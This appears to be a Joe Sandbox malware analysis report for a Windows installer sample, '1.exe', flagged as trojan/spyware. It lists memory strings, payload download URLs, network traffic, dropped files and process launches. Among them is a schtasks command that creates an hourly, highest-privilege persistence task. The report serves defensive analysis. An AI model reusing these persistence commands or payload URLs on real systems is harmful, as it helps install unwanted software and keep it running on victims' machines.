    Source: MainSoftware.exe, 00000010.00000002.2141451491.0000027535BE0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://jonatechlab.com/logs/telemetry
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com/logs/telemetry-MyPersistentApp_Hourly
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.comH123e4567-e89b-12d3-a456-426614174000
    Source: 1.exe, 1.exe, 00000004.00000003.2247463366.00000000081B9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1597724599.000000000819A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000017.00000002.2171835175.000000137B189000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://qb-hos.pages.dev/page-2/?source_id=6
    Source: 1.exe, 1.exe, 00000004.00000003.1316784592.0000000008216000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1316821573.000000000821A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.000000000506F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517337406.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.0000000005071000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
    Source: 1.exe, 00000004.00000003.2248179709.00000000053E4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247638745.00000000053E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe=
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exep
    Source: 1.exe, 1.exe, 0000000B.00000003.2227216121.000000000506F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.0000000005071000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkg
    Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkgCtrlEvt
    Source: 1.exe, 00000004.00000002.2261284310.000000000819A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1597724599.000000000819A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Surfclub.pkge
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ssl.com/repository0
    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0094E120 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0086A490 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00867490 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00866610 NtdllDefWindowProc_W,NtdllDefWindowProc_W,GlobalAlloc,GlobalLock,GlobalUnlock,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00869640 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008717B0 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0087F730 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008E2730 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00871920 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0088DAD0 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00879E00 NtdllDefWindowProc_W,DeleteCriticalSection
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00869E30 NtdllDefWindowProc_W
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\51577c.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5903.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5971.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI59B1.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5A00.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{67AEF7BA-A109-4700-BE3F-0231069B1923}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7A3B.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7AA9.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7B27.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7B86.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8914.tmp
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI5903.tmp
Source: C:\Users\user\Desktop\1.exe | Code function: 4_3_053E53BD
Source: C:\Users\user\Desktop\1.exe | Code function: 4_3_053E53BD
Source: C:\Users\user\Desktop\1.exe | Code function: 4_3_053E0914
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00880350
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00851490
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00889000
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008E71E0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00857950
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008871F0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0088F1F0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008833B3
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_008903D0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A184F0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00853420
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A22560
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00885A80
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A18A70
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A19A50
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00880BB0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0089EB20
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0089DCD0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00AA2C50
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0087BDE0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00990DF0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00898D50
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00867E90
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00871E60
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A0FFB0
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00A18F80
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00896F60
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe C0A814EECAE4E5B4B295F14E4FCFB49C7CEDF47616AA5A1B068DE42272F4976A
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Main\Chop\Install.exe 63FB3ED0ABA87917847AD256C4E89F7B250ADC6E2EAC74023BB52E091AB0EF97
Source: C:\Users\user\Desktop\1.exe | Code function: String function: 008587B0 appears 52 times
Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00859190 appears 125 times
Source: C:\Users\user\Desktop\1.exe | Code function: String function: 009A7760 appears 32 times
Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00A84B73 appears 42 times
Source: MainSoftware.exe.4.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: SoftwareDistributor.exe.4.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: SoftwareDistributor.exe.7.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: MainSoftware.exe.7.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Install.exe.part.13.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Install.exe.part.13.dr | Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewininet.dllD vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelzmaextractor.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C55A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000CA0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C534000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSerilog.Formatting.Compact.dllV vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C6B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000CA07000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C976000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C9A5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.2247463366.00000000081D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsi.dllX vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Channels.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Formats.Asn1.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1597724599.00000000081D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsi.dllX vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C539000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSerilog.Sinks.Http.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.2257156984.00000000081D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsi.dllX vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C66E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.2253775582.00000000081D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsi.dllX vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C993000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Numerics.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5D2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C570000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C523000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSerilog.dll0 vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C699000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C57D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C961000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C9AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C59F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C550000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C684000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C6E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C569000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C5B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C562000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C576000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C548000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameShortcutFlags.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAICustAct.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePrereq.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFileOperations.dllF vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemscordaccore.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
Source: 1.exe, 00000004.00000003.1588667153.000000000C679000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs 1.exe
Source: 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewininet.dllD vs 1.exe
Source: 1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal48.troj.spyw.evad.winEXE@36/86@4/5
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_009B8DA0 FormatMessageW,GetLastError
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_00893550 GetDriveTypeW,GetDiskFreeSpaceExW
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0089D260 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\1.exe | Code function: 11_2_0085A8A0 LoadResource,LockResource,SizeofResource
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Atomix
Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Roaming\Atomix
Source: C:\Program Files\Surfclub\Install.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Local\Temp\shiA18.tmp
Source: 1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1.exe | Virustotal: Detection: 27%
Source: 1.exe | ReversingLabs: Detection: 21%
Source: 1.exe | String found in binary or memory: https://swiftvantage.online/tools/files/dc657fbe-5659-47ad-b5f6-05fa4c901173/msi/Install.exe
Source: C:\Users\user\Desktop\1.exe | File read: C:\Users\user\Desktop\1.exe
Source: unknown | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF C
Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643E
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
